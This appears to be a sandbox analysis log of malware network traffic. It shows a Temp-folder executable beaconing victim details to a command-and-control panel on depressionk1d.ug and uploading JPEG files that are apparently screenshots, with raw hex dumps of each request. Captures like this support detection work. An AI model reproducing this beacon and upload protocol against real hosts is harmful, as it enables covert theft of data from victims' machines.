                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          25192.168.2.449809178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:22.900768042 CET3102OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----05c424e8f40820a4174cda24ec338f42
                          Host: depressionk1d.ug
                          Content-Length: 108145
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:22.900939941 CET3103OUTData Raw: 2d 2d 2d 2d 2d 2d 30 35 63 34 32 34 65 38 66 34 30 38 32 30 61 34 31 37 34 63 64 61 32 34 65 63 33 33 38 66 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------05c424e8f40820a4174cda24ec338f42Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:22.901187897 CET3113OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:22.901346922 CET3115OUTData Raw: 48 7a d2 d1 4c 42 52 d1 40 a0 61 45 14 1a 04 14 52 aa b3 1c 2a 92 7d 00 ab 29 a7 5e 49 f7 6d df fe 04 31 fc e8 49 bd 82 e5 5a 2b 49 34 4b a6 fb c6 34 fa 9c ff 00 2a ad 7b 68 6c a6 58 cb 86 25 77 64 0c 77 3f e1 54 e1 24 ae d0 26 8a d4 51 47 6a 91
                          Data Ascii: HzLBR@aER*})^Im1IZ+I4K4*{hlX%wdw?T$&QGjQ@(Z()h(4QEzE$q^?YM#_Iuq]L*I<c*:;R@E-RZ)1ERLBbPhRbRSR)EPA
                          Nov 12, 2021 22:23:22.923528910 CET3123OUTData Raw: 32 b1 f3 ab 0f 8c e7 f6 9c ae e6 87 83 bc 41 35 cd de 95 a1 5e e4 dc d9 5d b9 8d ba e5 04 32 82 09 f6 24 0f a7 d2 bc db e3 77 fc 94 79 7f eb d6 2f e5 5e a3 e1 7f 00 ea da 2f 88 ed 35 1b ab 8b 37 8a 1d fb 84 6e e5 b9 42 a3 19 51 ea 3b d7 97 7c 6d
                          Data Ascii: 2A5^]2$wy/^/57nBQ;|m7{E:O'uo0h5UY<hqBjeL~ko^4.J9\aAdqSG?"ibl.yT^kG
                          Nov 12, 2021 22:23:22.923561096 CET3126OUTData Raw: 77 2c c0 7f 4a a7 4d b4 e3 d1 92 a6 93 e6 ea 8e 86 12 f6 d0 58 bd cb 04 b9 d7 d5 34 6b 80 4f 31 34 48 f0 49 9e 46 3e 7f 21 bd 38 ac 8b ed 3a f6 f7 5e b8 b5 b3 88 cf 16 9f 25 b6 92 a4 3a 80 65 db b0 75 23 ef 3a 39 cf 4e 79 c5 54 48 f4 22 4e db 19
                          Data Ascii: w,JMX4kO14HIF>!8:^%:eu#:9NyTH"Nt7Ul(5xR-Zo{[h"pCsYzG\#EnD,\qu&;P"{7mLZWh"i>V1"\c9SX_%c
                          Nov 12, 2021 22:23:22.923573017 CET3128OUTData Raw: 76 61 ed a3 06 9d 48 6b 94 eb b8 dc 51 4b 45 21 8d a2 9d 8a 31 4a c3 1b cd 2f 34 b8 a4 c1 f5 a2 c1 70 e6 8e 68 c5 14 58 2e 25 28 a3 9a 39 a0 02 94 52 56 e6 8b e1 1d 7f c4 56 b2 5c 69 1a 6c b7 71 46 fb 1d a3 2b f2 b6 33 8e 4f a1 a1 b4 b7 0b 37 b1
                          Data Ascii: vaHkQKE!1J/4phX.%(9RVV\ilqF+3O7iu|kBI/]KC\rTV}o@E}WNY<M4DE-[~U;?h{)d~5rQ:lp3n-DrY%)EG
                          Nov 12, 2021 22:23:22.923681021 CET3134OUTData Raw: f2 00 0a f2 a3 e0 8f 12 8f f9 84 cf f9 af f8 d7 a1 7c 3b d6 3e cb 6e fe 1a d4 bf 71 7d 6c e7 cb 8d c8 cb 29 f9 88 fa 8c 9e 3d fd ab a7 33 9c 2b 51 fd d4 93 b3 bb b3 e8 71 e5 90 9d 1a df bd 8b 57 56 57 5d 4d 5f f8 58 de 15 ff 00 a0 89 ff 00 c0 79
                          Data Ascii: |;>nq}l)=3+QqWVW]M_Xy??cx[M5,K=-LRt3^-(FW#9wY<Bz|XEby=EyvbAa{iXgRg,))qExG%
                          Nov 12, 2021 22:23:22.923705101 CET3138OUTData Raw: a4 53 15 71 9c 32 6f 53 b1 b9 ea b8 3d 3d 05 24 3a ce af 04 d6 d2 ad fb 33 db c5 24 28 64 45 70 52 46 66 75 70 c0 ef 0c 59 89 dd 9e b5 2e 95 56 97 7e bf 77 f5 f9 ee 52 ab 4d 7f 5f d7 f5 e4 51 1d 05 2d 0a 30 31 4b 5d a8 e3 61 45 14 76 a0 02 8a 05
                          Data Ascii: Sq2oS==$:3$(dEpRFfupY.V~wRM_Q-01K]aEv)@QJ1%;QJ(q1@@(-zRy`G4&sNr9[c`F3fZZ})KKCM00IKNvXQE/jRRbJuSRbb
                          Nov 12, 2021 22:23:22.923746109 CET3143OUTData Raw: 3b 14 82 96 a8 96 2d 28 a4 02 9d 54 26 14 52 e2 80 29 92 00 53 80 a0 0a 5c 53 13 16 96 90 0a 70 15 44 80 14 a0 50 05 3b 14 c4 d8 82 9d 49 4b 54 48 b4 ea 68 a7 53 24 51 4b 48 05 38 55 09 8b 4e a6 d2 d5 22 47 8a 51 4d 14 ea 68 96 2d 28 a6 d3 a9 92
                          Data Ascii: ;-(T&R)S\SpDP;IKTHhS$QKH8UN"GQMh-(8RQL(x4PhNfdQ$F;>hxjx4h58z baFosRK&D>C5q^}SS;mZ_hm*^>=MdFIPEk5Hs;
                          Nov 12, 2021 22:23:22.946100950 CET3152OUTData Raw: cb 90 6c 62 ca 18 92 36 94 3f 33 73 d3 16 1f c4 56 fa 8d 84 f0 6b 5a 75 cd c5 c4 9a 84 d7 eb 35 a5 da c2 aa d2 2a 02 a5 5a 37 ca 8d 83 18 23 d2 92 75 7f af 55 fa 5c b9 2a 37 76 db fe 1f f5 b1 89 5d 25 8e 91 a5 8d 3c 5f df 0b d9 63 5d 1e 4d 41 e2
                          Data Ascii: lb6?3sVkZu5*Z7#uU\*7v]%<_c]MAd<8:V;(4#g=j|c<-iF$33c6MHh\Ik}/GK?+MU[1*h,sQ!0y{s
                          Nov 12, 2021 22:23:22.993951082 CET3218INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:22 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          250192.168.2.450064178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:09.716557980 CET10596OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:09.739108086 CET10598INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:09 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:09.739125967 CET10599INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          251192.168.2.450066178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:09.872169971 CET10600OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:09.900198936 CET10601INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:09 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          252192.168.2.450068178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:10.029752970 CET10603OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:10.052141905 CET10604INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:10 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:10.052155018 CET10604INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          253192.168.2.450069178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:10.184468985 CET10607OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:10.213953972 CET10607INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:10 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:24:10.268330097 CET10608OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:10.268608093 CET10608OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:10.268991947 CET10618OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:10.269248009 CET10621OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:10.291610956 CET10626OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:10.291687012 CET10642OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:10.291727066 CET10647OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
